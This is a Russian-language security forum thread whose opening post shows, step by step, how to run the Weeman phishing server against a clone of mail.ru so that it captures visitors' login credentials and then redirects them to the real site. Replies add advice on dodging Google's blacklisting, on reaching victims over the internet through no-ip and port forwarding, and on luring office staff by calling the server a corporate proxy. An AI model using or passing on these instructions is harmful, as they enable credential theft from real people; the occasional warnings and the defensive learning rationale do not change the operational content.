• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Weeman: Phishing - web-сервер

Всем привет! Здесь я хочу показать, как легко поднять простой, но довольно эффективный web-server для фишинга.

upload_2016-10-31_21-25-7.png


Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.

Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.

> git clone github.com/Hypsurus/weeman

Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:

> cd weeman/

> ls –a

> chmod a+x weeman.py

upload_2016-10-31_21-25-42.png


> ./weeman.py

> help (сразу посмотрим доступные опции)

upload_2016-10-31_21-26-12.png


> show (посмотрим текущие настройки)

upload_2016-10-31_21-26-41.png


Используем weeman на примере mail.ru.

> set url hppts://mail.ru

> set port 8080

> set action_url

> run

upload_2016-10-31_21-27-27.png


Теперь, при обращении к серверу по адресу, в моем случае это 192.168.0.101:8080, мы попадаем на фишинговый вариант сайта mail.ru, внешне ничем не отличается:

upload_2016-10-31_21-28-18.png


После того как мы введем свои учетные данные сработает редирект на подлинный сайт, а мы получим учетные данные.

upload_2016-10-31_21-28-52.png


На этом пожалуй все, спасибо за внимание.
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
Добрый вечер,может знаете, как избежать индексации гугл в черный список таких серверов? Живут они не более суток...
 
V

Vladal

192.168.0.101:8080 и кто по такому адресу пройдет? был например такой mailworld то phishing удался почти
Все офисные хомячки попрутся, если им сказать, что это корпоративный прокси. Собственно, если этот сервер и сделать прослойкой между хомячками и проксёй.
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
антивирус определит как фишинг
Не определит пока не будет занесен в базу.так что для локального сегмента это работает...Если же вы используете это во внешней сети, то фишинговые сервера живут не более суток.
 

rez_pk

One Level
31.10.2016
3
1
BIT
0
Ок, в пределах домашней сети все круто, все работает.
А теперь, что нужно сделать и что нужно для того чтоб на "сайт" заходили из вне?
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
no-ip регистрируй, и пробрасывай в роутере порт, и будет тебе счастье...ну и перед использованием рекомендую почитать уголовный кодекс..)
 
  • Нравится
Реакции: Flywalk, z3RoTooL и Vander

rez_pk

One Level
31.10.2016
3
1
BIT
0
ну как обычно... ничего не зная, делать выводы мы все умеем. пусть будет по вашему. как держать оборону если не знать как это работает?
и кстати спасибо, что беспокоитесь)
 
Последнее редактирование:
  • Нравится
Реакции: Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 347
BIT
0
ну как обычно... ничего не зная, делать выводы мы все умеем. пусть будет по вашему. как держать оборону если не знать как это работает?
и кстати спасибо, что беспокоитесь)
На самом деле, я еще не пробовал сделать доступ извне, как время появиться поэксперементирую.
 
D

Darius

офф-топ конечно, но тема схожая. В se-toolkit c выходом php7 появился баг с предупреждением о разнице во времени сервера и хоста, и таким образом refresh на исходный сайт не производится. Как решать сию проблему, кто-нибудь в курсе ?)
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
офф-топ конечно, но тема схожая. В se-toolkit c выходом php7 появился баг с предупреждением о разнице во времени сервера и хоста, и таким образом refresh на исходный сайт не производится. Как решать сию проблему, кто-нибудь в курсе ?)
Странно, я как раз для фишинга тестил setoolkit в связке с no-ip,все замечательно работает.
 
  • Нравится
Реакции: Vander
D

DoberGroup

>
ls –a
> chmod a+x weeman.py

Это лишнее.

Для тех, у кого на свежем дереве пакетов Python (например, на свежих Kali) вылетает с ошибками в стиле
Python:
File "/opt/weeman/lib/bs4/builder/_html5lib.py", line 70, in <module>
    class TreeBuilderForHtml5lib(html5lib.treebuilders._base.TreeBuilder):
AttributeError: 'module' object has no attribute '_base'

- это проблемы в кривизне beautifulsoup4 (v4.4.1) и html5lib>=0.99999999
Автор с неизвестной науке целью включил именно эту версию Beautiful Soup-а в пакет.
Я исправил, пул-реквест сделал, но смерджет ли его автор - не известно, он вроде как переписывает фреймворк на Node.js
 
С

сергей799

привет я что о не понял тоесть жертва будет заходит на мой маил ру и все ее данные будут приходить мне или я что то не понял?
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
будет заходит на мой маил ру и все ее данные будут приходить мне или я что то не понял?

Что склонируеете на то и будет переход по ссылке Вашей, и если там будет форма ввода данных, она будет заполнена, Вы увидите это.
 

flesh91

Green Team
25.02.2017
35
51
BIT
0
Здраствуйте, на github weeman не доступен скиньте пожалуйста сюда у кого есть спасибо
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!